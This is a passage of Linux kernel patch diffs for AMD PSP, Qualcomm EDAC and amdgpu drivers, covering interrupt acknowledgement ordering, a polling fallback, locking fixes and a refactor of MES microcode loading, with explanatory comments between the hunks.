+--- a/drivers/crypto/ccp/psp-dev.c
++++ b/drivers/crypto/ccp/psp-dev.c
+@@ -42,6 +42,9 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 	/* Read the interrupt status: */
+ 	status = ioread32(psp->io_regs + psp->vdata->intsts_reg);
+ 
++	/* Clear the interrupt status by writing the same value we read. */
++	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
++
+ 	/* invoke subdevice interrupt handlers */
+ 	if (status) {
+ 		if (psp->sev_irq_handler)
+@@ -51,9 +54,6 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 			psp->tee_irq_handler(irq, psp->tee_irq_data, status);
+ 	}
+ 
+-	/* Clear the interrupt status by writing the same value we read. */
+-	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
+-
+ 	return IRQ_HANDLED;
+ }
+ 
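Acking before dispatching closes a lost-interrupt window: with the old order, a status bit raised by new work while the sub-handlers were running would be cleared at the end without ever having been observed. The pattern the hunk adopts, in generic form (regs, INTSTS and dispatch() are placeholders):

static irqreturn_t dev_irq(int irq, void *data)
{
	u32 status = ioread32(regs + INTSTS);	/* 1. latch the causes    */

	iowrite32(status, regs + INTSTS);	/* 2. ack what we latched */
	dispatch(status);			/* 3. handle them         */

	/* A bit that sets after step 1 is not in 'status', survives the
	 * write-one-to-clear ack, and re-raises the interrupt. */
	return IRQ_HANDLED;
}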
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index c45519f59dc11..2c91ceff8a9ca 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -76,6 +76,8 @@
+ #define DRP0_INTERRUPT_ENABLE           BIT(6)
+ #define SB_DB_DRP_INTERRUPT_ENABLE      0x3
+ 
++#define ECC_POLL_MSEC			5000
++
+ enum {
+ 	LLCC_DRAM_CE = 0,
+ 	LLCC_DRAM_UE,
+@@ -285,8 +287,7 @@ dump_syn_reg(struct edac_device_ctl_info *edev_ctl, int err_type, u32 bank)
+ 	return ret;
+ }
+ 
+-static irqreturn_t
+-llcc_ecc_irq_handler(int irq, void *edev_ctl)
++static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ {
+ 	struct edac_device_ctl_info *edac_dev_ctl = edev_ctl;
+ 	struct llcc_drv_data *drv = edac_dev_ctl->dev->platform_data;
+@@ -332,6 +333,11 @@ llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 	return irq_rc;
+ }
+ 
++static void llcc_ecc_check(struct edac_device_ctl_info *edev_ctl)
++{
++	llcc_ecc_irq_handler(0, edev_ctl);
++}
++
+ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ {
+ 	struct llcc_drv_data *llcc_driv_data = pdev->dev.platform_data;
+@@ -359,29 +365,31 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	edev_ctl->ctl_name = "llcc";
+ 	edev_ctl->panic_on_ue = LLCC_ERP_PANIC_ON_UE;
+ 
+-	rc = edac_device_add_device(edev_ctl);
+-	if (rc)
+-		goto out_mem;
+-
+-	platform_set_drvdata(pdev, edev_ctl);
+-
+-	/* Request for ecc irq */
++	/* Check if LLCC driver has passed ECC IRQ */
+ 	ecc_irq = llcc_driv_data->ecc_irq;
+-	if (ecc_irq < 0) {
+-		rc = -ENODEV;
+-		goto out_dev;
+-	}
+-	rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
++	if (ecc_irq > 0) {
++		/* Use interrupt mode if IRQ is available */
++		rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
+ 			      IRQF_TRIGGER_HIGH, "llcc_ecc", edev_ctl);
+-	if (rc)
+-		goto out_dev;
++		if (!rc) {
++			edac_op_state = EDAC_OPSTATE_INT;
++			goto irq_done;
++		}
++	}
+ 
+-	return rc;
++	/* Fall back to polling mode otherwise */
++	edev_ctl->poll_msec = ECC_POLL_MSEC;
++	edev_ctl->edac_check = llcc_ecc_check;
++	edac_op_state = EDAC_OPSTATE_POLL;
+ 
+-out_dev:
+-	edac_device_del_device(edev_ctl->dev);
+-out_mem:
+-	edac_device_free_ctl_info(edev_ctl);
++irq_done:
++	rc = edac_device_add_device(edev_ctl);
++	if (rc) {
++		edac_device_free_ctl_info(edev_ctl);
++		return rc;
++	}
++
++	platform_set_drvdata(pdev, edev_ctl);
+ 
+ 	return rc;
+ }
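The reshuffled probe is the standard EDAC "interrupt if available, poll otherwise" shape, and edac_device_add_device() deliberately moves after the mode decision because the core wires up the polling workqueue (from poll_msec/edac_check) at registration time. Condensed to its skeleton, error handling trimmed:

if (ecc_irq > 0 &&
    !devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
		      IRQF_TRIGGER_HIGH, "llcc_ecc", edev_ctl)) {
	edac_op_state = EDAC_OPSTATE_INT;	/* interrupt driven */
} else {
	edev_ctl->poll_msec = ECC_POLL_MSEC;	/* poll every 5 s   */
	edev_ctl->edac_check = llcc_ecc_check;
	edac_op_state = EDAC_OPSTATE_POLL;
}
rc = edac_device_add_device(edev_ctl);		/* register last    */

Note how llcc_ecc_check() simply calls the IRQ handler with irq 0, so both modes share one scrubbing routine.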
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9776e0b488cf6..011e4fbe27f10 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4483,7 +4483,11 @@ static int amdgpu_device_recover_vram(struct amdgpu_device *adev)
+ 	dev_info(adev->dev, "recover vram bo from shadow start\n");
+ 	mutex_lock(&adev->shadow_list_lock);
+ 	list_for_each_entry(vmbo, &adev->shadow_list, shadow_list) {
+-		shadow = &vmbo->bo;
++		/* If vm is compute context or adev is APU, shadow will be NULL */
++		if (!vmbo->shadow)
++			continue;
++		shadow = vmbo->shadow;
++
+ 		/* No need to recover an evicted BO */
+ 		if (shadow->tbo.resource->mem_type != TTM_PL_TT ||
+ 		    shadow->tbo.resource->start == AMDGPU_BO_INVALID_OFFSET ||
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 0c546245793b9..82e27bd4f0383 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -21,6 +21,8 @@
+  *
+  */
+ 
++#include <linux/firmware.h>
++
+ #include "amdgpu_mes.h"
+ #include "amdgpu.h"
+ #include "soc15_common.h"
+@@ -1423,3 +1425,60 @@ error_pasid:
+ 	kfree(vm);
+ 	return 0;
+ }
++
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe)
++{
++	const struct mes_firmware_header_v1_0 *mes_hdr;
++	struct amdgpu_firmware_info *info;
++	char ucode_prefix[30];
++	char fw_name[40];
++	int r;
++
++	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
++	snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++		ucode_prefix,
++		pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
++	if (r)
++		goto out;
++
++	mes_hdr = (const struct mes_firmware_header_v1_0 *)
++		adev->mes.fw[pipe]->data;
++	adev->mes.uc_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
++	adev->mes.data_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
++
++	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
++		int ucode, ucode_data;
++
++		if (pipe == AMDGPU_MES_SCHED_PIPE) {
++			ucode = AMDGPU_UCODE_ID_CP_MES;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
++		} else {
++			ucode = AMDGPU_UCODE_ID_CP_MES1;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
++		}
++
++		info = &adev->firmware.ucode[ucode];
++		info->ucode_id = ucode;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
++			      PAGE_SIZE);
++
++		info = &adev->firmware.ucode[ucode_data];
++		info->ucode_id = ucode_data;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
++			      PAGE_SIZE);
++	}
++
++	return 0;
++out:
++	amdgpu_ucode_release(&adev->mes.fw[pipe]);
++	return r;
++}
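For a concrete picture of the name construction: amdgpu_ucode_ip_version_decode() yields a prefix such as "gc_11_0_0" (illustrative value), so the two pipes resolve to

	pipe == AMDGPU_MES_SCHED_PIPE  ->  "amdgpu/gc_11_0_0_mes.bin"
	pipe == AMDGPU_MES_KIQ_PIPE    ->  "amdgpu/gc_11_0_0_mes1.bin"

with the "" / "1" suffix in the snprintf() above selecting between them.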
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+index ad980f4b66e19..547ec35691fac 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+@@ -91,14 +91,12 @@ struct amdgpu_mes {
+ 	struct amdgpu_bo		*ucode_fw_obj[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t			ucode_fw_gpu_addr[AMDGPU_MAX_MES_PIPES];
+ 	uint32_t			*ucode_fw_ptr[AMDGPU_MAX_MES_PIPES];
+-	uint32_t                        ucode_fw_version[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t                        uc_start_addr[AMDGPU_MAX_MES_PIPES];
+ 
+ 	/* mes ucode data */
+ 	struct amdgpu_bo		*data_fw_obj[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t			data_fw_gpu_addr[AMDGPU_MAX_MES_PIPES];
+ 	uint32_t			*data_fw_ptr[AMDGPU_MAX_MES_PIPES];
+-	uint32_t                        data_fw_version[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t                        data_start_addr[AMDGPU_MAX_MES_PIPES];
+ 
+ 	/* eop gpu obj */
+@@ -308,6 +306,7 @@ struct amdgpu_mes_funcs {
+ 
+ int amdgpu_mes_ctx_get_offs(struct amdgpu_ring *ring, unsigned int id_offs);
+ 
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe);
+ int amdgpu_mes_init(struct amdgpu_device *adev);
+ void amdgpu_mes_fini(struct amdgpu_device *adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+index e9b45089a28a6..863b2a34b2d64 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+@@ -38,6 +38,7 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ {
+ 	struct fd f = fdget(fd);
+ 	struct amdgpu_fpriv *fpriv;
++	struct amdgpu_ctx_mgr *mgr;
+ 	struct amdgpu_ctx *ctx;
+ 	uint32_t id;
+ 	int r;
+@@ -51,8 +52,11 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ 		return r;
+ 	}
+ 
+-	idr_for_each_entry(&fpriv->ctx_mgr.ctx_handles, ctx, id)
++	mgr = &fpriv->ctx_mgr;
++	mutex_lock(&mgr->lock);
++	idr_for_each_entry(&mgr->ctx_handles, ctx, id)
+ 		amdgpu_ctx_priority_override(ctx, priority);
++	mutex_unlock(&mgr->lock);
+ 
+ 	fdput(f);
+ 	return 0;
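idr_for_each_entry() provides no protection of its own against concurrent insertion or removal, and context handles in fpriv->ctx_mgr can be created and freed by other threads of the same process, so the walk has to run under the manager lock. The invariant as a pattern (use() is a placeholder):

mutex_lock(&mgr->lock);
idr_for_each_entry(&mgr->ctx_handles, ctx, id)
	use(ctx);			/* ctx cannot be freed under us */
mutex_unlock(&mgr->lock);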
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+index 5cb62e6249c23..6e7058a2d1c82 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+@@ -1091,3 +1091,39 @@ void amdgpu_ucode_ip_version_decode(struct amdgpu_device *adev, int block_type,
+ 
+ 	snprintf(ucode_prefix, len, "%s_%d_%d_%d", ip_name, maj, min, rev);
+ }
++
++/*
++ * amdgpu_ucode_request - Fetch and validate amdgpu microcode
++ *
++ * @adev: amdgpu device
++ * @fw: pointer to load firmware to
++ * @fw_name: firmware to load
++ *
++ * This is a helper that will use request_firmware and amdgpu_ucode_validate
++ * to load and run basic validation on firmware. If the load fails, remap
++ * the error code to -ENODEV, so that early_init functions will fail to load.
++ */
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name)
++{
++	int err = request_firmware(fw, fw_name, adev->dev);
++
++	if (err)
++		return -ENODEV;
++	err = amdgpu_ucode_validate(*fw);
++	if (err)
++		dev_dbg(adev->dev, "\"%s\" failed to validate\n", fw_name);
++
++	return err;
++}
++
++/*
++ * amdgpu_ucode_release - Release firmware microcode
++ *
++ * @fw: pointer to firmware to release
++ */
++void amdgpu_ucode_release(const struct firmware **fw)
++{
++	release_firmware(*fw);
++	*fw = NULL;
++}
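With the pair in place, every loader collapses to the same shape; the MES conversion above is the first user in this patch. A typical caller, sketched:

r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
if (r) {
	/* request failure is remapped to -ENODEV, validate failure keeps
	 * its own code; either way the caller releases and bails out */
	amdgpu_ucode_release(&adev->mes.fw[pipe]);
	return r;
}
/* ... use adev->mes.fw[pipe]->data ... */
amdgpu_ucode_release(&adev->mes.fw[pipe]);	/* sw_fini / teardown */

Since amdgpu_ucode_release() NULLs the pointer after release_firmware() (which itself tolerates NULL), releasing an already-released or never-loaded slot is harmless.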
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+index 1c36235b4539c..4c20eb410960d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+@@ -543,6 +543,9 @@ void amdgpu_ucode_print_sdma_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_psp_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_gpu_info_hdr(const struct common_firmware_header *hdr);
+ int amdgpu_ucode_validate(const struct firmware *fw);
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name);
++void amdgpu_ucode_release(const struct firmware **fw);
+ bool amdgpu_ucode_hdr_version(union amdgpu_firmware_header *hdr,
+ 				uint16_t hdr_major, uint16_t hdr_minor);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 0320be4a5fc6c..1f3fdf6cb903e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3797,7 +3797,8 @@ static int gfx_v9_0_hw_fini(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__GFX))
++		amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_reg_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_inst_irq, 0);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+index f513e2c2e964f..d96ee48e1706a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+@@ -1142,7 +1142,6 @@ static int gmc_v10_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 96e0bb5bee78e..2d11e8e7e1235 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -931,7 +931,6 @@ static int gmc_v11_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 	gmc_v11_0_gart_disable(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+index 67ca16a8027c7..0d9e9d9dd4a1d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+@@ -1898,7 +1898,6 @@ static int gmc_v9_0_hw_fini(void *handle)
+ 	if (adev->mmhub.funcs->update_power_gating)
+ 		adev->mmhub.funcs->update_power_gating(adev, false);
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+index a1b751d9ac064..323d68b2124fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+@@ -54,6 +54,7 @@ static int jpeg_v3_0_early_init(void *handle)
+ 
+ 	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(3, 1, 1):
++	case IP_VERSION(3, 1, 2):
+ 		break;
+ 	default:
+ 		harvest = RREG32_SOC15(JPEG, 0, mmCC_UVD_HARVESTING);
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+index 067d10073a562..09105029445a8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+@@ -375,93 +375,6 @@ static const struct amdgpu_mes_funcs mes_v10_1_funcs = {
+ 	.resume_gang = mes_v10_1_resume_gang,
+ };
+ 
+-static int mes_v10_1_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	const char *chip_name;
+-	char fw_name[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	switch (adev->ip_versions[GC_HWIP][0]) {
+-	case IP_VERSION(10, 1, 10):
+-		chip_name = "navi10";
+-		break;
+-	case IP_VERSION(10, 3, 0):
+-		chip_name = "sienna_cichlid";
+-		break;
+-	default:
+-		BUG();
+-	}
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 chip_name);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 chip_name);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_version);
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_data_version);
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v10_1_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v10_1_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1019,10 +932,6 @@ static int mes_v10_1_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v10_1_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v10_1_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1059,8 +968,7 @@ static int mes_v10_1_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v10_1_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1229,6 +1137,22 @@ static int mes_v10_1_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v10_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v10_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1241,6 +1165,7 @@ static int mes_v10_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v10_1_ip_funcs = {
+ 	.name = "mes_v10_1",
++	.early_init = mes_v10_0_early_init,
+ 	.late_init = mes_v10_0_late_init,
+ 	.sw_init = mes_v10_1_sw_init,
+ 	.sw_fini = mes_v10_1_sw_fini,
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 6f0e389be5f6a..e3168149ca8f6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -453,84 +453,6 @@ static const struct amdgpu_mes_funcs mes_v11_0_funcs = {
+ 	.misc_op = mes_v11_0_misc_op,
+ };
+ 
+-static int mes_v11_0_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	char fw_name[30];
+-	char ucode_prefix[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 ucode_prefix);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 ucode_prefix);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_version);
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_data_version);
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v11_0_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v11_0_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1098,10 +1020,6 @@ static int mes_v11_0_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v11_0_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v11_0_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1138,8 +1056,7 @@ static int mes_v11_0_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v11_0_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1334,6 +1251,22 @@ static int mes_v11_0_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v11_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v11_0_late_init(void *handle)
+ {
